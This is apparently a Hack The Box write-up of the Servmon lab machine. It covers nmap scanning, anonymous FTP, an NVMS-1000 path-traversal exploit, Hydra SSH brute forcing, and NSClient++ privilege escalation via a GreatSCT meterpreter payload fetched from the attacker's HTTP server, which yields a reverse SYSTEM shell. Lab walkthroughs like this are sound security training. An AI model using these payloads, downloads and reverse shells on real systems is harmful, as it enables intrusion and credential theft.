Servmon

Join The Best Hacking Community Worldwide | Hack The Box

Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!

www.hackthebox.com

Initial Scan with Nmap

We begin by running an nmap scan against the target machine to identify open ports and services:

nmap -sC -sV -Pn -v 10.129.232.55

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  07:35PM       <DIR>          Users
22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
|   256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_  256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp   open  http
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| http-methods: 
|_  Supported Methods: GET
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after:  2021-01-13T13:24:20
| MD5:   1d03:0c40:5b7a:0f6d:d8c8:78e3:cba7:38b4
|_SHA-1: 7083:bd82:b4b0:f9c0:cc9c:5019:2f9f:9291:4694:8334
| http-title: NSClient++
|_Requested resource was /index.html
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     @+hb
|     workers
|_    jobs
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.94SVN%I=7%D=10/27%Time=671EFECA%P=x86_64-pc-linux-gnu%r(
SF:NULL,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20
SF:\r\n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x2
SF:0text/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInf
SF:o:\x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\
SF:x20XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtm
SF:l1/DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.
SF:w3\.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\
SF:x20\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\
SF:n\x20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r
SF:\n")%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text
SF:/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x2
SF:0\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XH
SF:TML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DT
SF:D/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.o
SF:rg/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x
SF:20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20
SF:\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%
SF:r(RTSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html
SF:\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x
SF:201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xht
SF:ml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/19
SF:99/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x2
SF:0\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\
SF:x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=10/27%Time=671EFED2%P=x86_64-pc-linu
SF:x-gnu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLoca
SF:tion:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\x8f\x01\0\0\0\+hb\x8f
SF:\x01\0\0@\+hb\x8f\x01\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs
SF:\x12\x02\x18\x20\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nConten
SF:t-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,3
SF:6,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20
SF:found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n
SF:\r\nDocument\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nCon
SF:tent-Length:\x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-10-28T03:04:28
|_  start_date: N/A
|_clock-skew: -5s

This reveals several open ports, including:

Port 21: FTP (Microsoft FTP service)

Anonymous login enabled

Port 22: SSH (OpenSSH for Windows 8.0)
Port 80: HTTP
Port 8443: SSL (NSClient++)

From the scan results, we learn that anonymous FTP access is allowed, and there is an HTTP server with a redirect to a login page.

What service runs on port 21? FTP

Is anonymous authentication enabled on the FTP service? Yes

Connecting to FTP

Using the anonymous credentials, we connect to the FTP service:

ftp 10.129.232.55
Name: anonymous
Password: (press Enter)

We navigate to the Nadine directory and download Confidential.txt, which contains a message indicating the presence of Passwords.txt on Nathan's desktop.

└─$ ftp 10.129.232.55         
Connected to 10.129.232.55
220 Microsoft FTP Service
Name (10.129.232.55:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49684|)
125 Data connection already open; Transfer starting.
02-28-22  07:35PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
02-28-22  07:36PM       <DIR>          Nadine
02-28-22  07:37PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
ls
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49686|)
150 Opening ASCII mode data connection.
02-28-22  07:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||49687|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************|   168        1.33 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (1.32 KiB/s)

ftp> ls
229 Entering Extended Passive Mode (|||50838|)
125 Data connection already open; Transfer starting.
02-28-22  07:36PM                  182 Notes to do.txt
226 Transfer complete.
ftp> get Notes to do.txt

Upon opening Confidential.txt, we discover:

└─$ cat Confidential.txt          
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

Upon opening Notes to do.txt, we discover:

└─$ cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

What is the full name of the sensitive file present on Nathans's Desktop? Passwords.txt

Exploring the HTTP Service

Navigating to http://10.129.227.77, we find a webpage for NVMS-1000, a network video surveillance application. After some research, we find that CVE-2019-20085 affects this software, allowing arbitrary file read.

We download the exploit from https://github.com/AleDiBen/NVMS1000-Exploit/blob/master/nvms.py

Using the exploit, we retrieve Passwords.txt from Nathan's desktop, which provides several potential passwords.

└─$ python nvms.py 10.129.227.77 Users/Nathan/Desktop/Passwords.txt Passwords.txt 
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content

++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!                                                                                                 
Th3r34r3To0M4nyTrait0r5!                                                                                            
B3WithM30r4ga1n5tMe                                                                                                 
L1k3B1gBut7s@W0rk                                                                                                   
0nly7h3y0unGWi11F0l10w                                                                                              
IfH3s4b0Utg0t0H1sH0me                                                                                               
Gr4etN3w5w17hMySk1Pa5$                                                                                              
++++++++++  END  ++++++++++

Brute Force SSH Login

Using Hydra, we brute-force the SSH login for Nadine with the passwords obtained from Passwords.txt:

└─$ hydra -L users.txt -P passwords.txt 10.129.227.77 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-27 23:43:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking ssh://10.129.227.77:22/
[22][ssh] host: 10.129.227.77   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-27 23:43:37

The valid credentials are found to be:

Username: Nadine
Password: L1k3B1gBut7s@W0rk

What is the valid password to authenticate over SSH on TCP port 22? L1k3B1gBut7s@W0rk

SSH Access and User Flag

We SSH into the machine using Nadine's credentials:

ssh Nadine@10.129.232.55

After logging in, we navigate to Nadine's desktop and retrieve the user.txt flag.

nadine@SERVMON C:\Users\Nadine>dir
 Volume in drive C has no label.
 Volume Serial Number is 20C1-47A1
 
 Directory of C:\Users\Nadine

02/28/2022  08:04 PM    <DIR>          .
02/28/2022  08:04 PM    <DIR>          ..
02/28/2022  08:04 PM    <DIR>          3D Objects
02/28/2022  08:04 PM    <DIR>          Contacts
02/28/2022  08:05 PM    <DIR>          Desktop
02/28/2022  08:04 PM    <DIR>          Documents
02/28/2022  08:04 PM    <DIR>          Downloads
02/28/2022  08:04 PM    <DIR>          Favorites
02/28/2022  08:04 PM    <DIR>          Links
02/28/2022  08:04 PM    <DIR>          Music
02/28/2022  08:04 PM    <DIR>          Pictures
02/28/2022  08:04 PM    <DIR>          Saved Games
02/28/2022  08:04 PM    <DIR>          Searches
02/28/2022  08:04 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)   6,128,906,240 bytes free

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 20C1-47A1

 Directory of C:\Users\Nadine\Desktop

02/28/2022  08:05 PM    <DIR>          .
02/28/2022  08:05 PM    <DIR>          ..
10/27/2024  07:59 PM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,128,906,240 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
d291702c4a1ab9dc8630b211a128be17

Investigating Installed Software

Checking the installed applications, we notice NSClient++ is installed.

nadine@SERVMON C:\>cd "Program Files" 

nadine@SERVMON C:\Program Files>dir 
 Volume in drive C has no label. 
 Volume Serial Number is 20C1-47A1

 Directory of C:\Program Files

02/28/2022  07:55 PM    <DIR>          .
02/28/2022  07:55 PM    <DIR>          ..
03/01/2022  02:20 AM    <DIR>          Common Files
11/11/2019  07:52 PM    <DIR>          internet explorer
02/28/2022  07:07 PM    <DIR>          MSBuild
02/28/2022  07:55 PM    <DIR>          NSClient++
02/28/2022  07:46 PM    <DIR>          NVMS-1000
02/28/2022  07:32 PM    <DIR>          OpenSSH-Win64
02/28/2022  07:07 PM    <DIR>          Reference Assemblies
02/28/2022  06:44 PM    <DIR>          VMware
11/11/2019  07:52 PM    <DIR>          Windows Defender
11/11/2019  07:52 PM    <DIR>          Windows Defender Advanced Threat Protection
09/15/2018  12:19 AM    <DIR>          Windows Mail
11/11/2019  07:52 PM    <DIR>          Windows Media Player
09/15/2018  12:19 AM    <DIR>          Windows Multimedia Platform
09/15/2018  12:28 AM    <DIR>          windows nt
11/11/2019  07:52 PM    <DIR>          Windows Photo Viewer
09/15/2018  12:19 AM    <DIR>          Windows Portable Devices
09/15/2018  12:19 AM    <DIR>          Windows Security
02/28/2022  07:25 PM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              20 Dir(s)   6,128,881,664 bytes free

There's an unusual third part application on the system. What's the name of a very this software? NSClient++

We inspect the nsclient.ini configuration file and find the following line:

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini 
ï»¿# If you want to fill this file with all available options run the following command: 
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

Exploitation

Let's set up an SSH tunnel to access the web app from localhost port 8443

ssh -L 8443:127.0.0.1:8443 nadine@10.129.232.55

Navigate to https://localhost:8443 and use the password found in the ini file to login. Let's create an external script that will execute our payload on the system.

Navigate to Settings > External Scripts > Scripts and click + Add new .

Next, input /settings/external scripts/scripts/shellz in the Section field, the command in the Key field, and C:\Users\Nadine\Documents\pwn.bat in Value . The bat file will be used to run commands as system.

Save the script and click on Changes , and then Save Configuration. Select Control > Reload

In order to get a shell, let's create a meterpreter payload with GreatSCT. Run setup.sh first.

cd ~/Servmon
git clone https://github.com/GreatSCT/GreatSCT
cd GreatSCT
sudo ./GreatSCT.py --ip 10.10.14.11 --port 1234 -t bypass -p
regsvcs/meterpreter/rev_tcp.py -o serv

===============================================================================
                                   Great Scott!
===============================================================================
      [Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================

 [*] Language: regsvcs
 [*] Payload Module: regsvcs/meterpreter/rev_tcp
 [*] DLL written to: /usr/share/greatsct-output/compiled/serv.dll
 [*] Source code written to: /usr/share/greatsct-output/source/serv.cs
 [*] Execute with: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe serv.dll
 [*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/serv.rc

Start a Python3 HTTP Server to download the DLL

cd /usr/share/greatsct-output/compiled/
sudo python3 -m http.server 80

Download the DLL from the server using PowerShell.

wget http://10.10.14.11/serv.dll -o C:\Users\Nadine\Documents\serv.dll

Let's echo our payload on the box to create pwn.bat.

Nadine@SERVMON C:\Users\Nadine>cmd /c "echo C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\Nadine\Documents\serv.dll > C:\Users\Nadine\Documents\pwn.bat"

Open msfconsole and specify the generated RCE file.

msfconsole -r /usr/share/greatsct-output/handlers/serv.rc

Next, navigate to the console on http://127.0.0.1/8443, input the script name shellz and click Run. Alternatively, select Control > Reload.

A connection is received. Sometimes the first connection dies. In that case run the command again, and a second connection will be received that is stable.

msf6 exploit(multi/handler) > 
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Meterpreter session 4 opened (10.10.14.11:1234 -> 10.129.232.55:50823) at 2024-10-28 02:03:09 -0400
[*] Meterpreter session 6 opened (10.10.14.11:1234 -> 10.129.232.55:50830) at 2024-10-28 02:03:12 -0400
[*] Sending stage (176198 bytes) to 10.129.232.55
[*] Meterpreter session 7 opened (10.10.14.11:1234 -> 10.129.232.55:50833) at 2024-10-28 02:03:30 -0400
[*] Meterpreter session 5 opened (10.10.14.11:1234 -> 10.129.232.55:50828) at 2024-10-28 02:03:33 -0400

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  4         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ SERVMON  10.10.14.11:1234 -> 10.129.232.55:50823 (10.129.232.55)
  5         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ SERVMON  10.10.14.11:1234 -> 10.129.232.55:50828 (10.129.232.55)
  6         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ SERVMON  10.10.14.11:1234 -> 10.129.232.55:50830 (10.129.232.55)
  7         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ SERVMON  10.10.14.11:1234 -> 10.129.232.55:50833 (10.129.232.55)

msf6 exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

The root flag is located in C:\Users\Administrator\Desktop

meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2022-03-01 04:18:46 -0500  desktop.ini
100444/r--r--r--  34    fil   2024-10-28 01:08:08 -0400  root.txt

meterpreter > cat root.txt
c4d110ea97852167eabb5e3d7290bca7

We have found a non-default application, we know the version installed and we can access it as an authenticated user. Searching for vulnerabilities affecting this environment reveals a Local Privilege Escalation vulnerability. As what user we get code execution after successfully exploiting this vulnerability? NT AUTHORITY\SYSTEM

References

HTB Servmon Official Walkthrough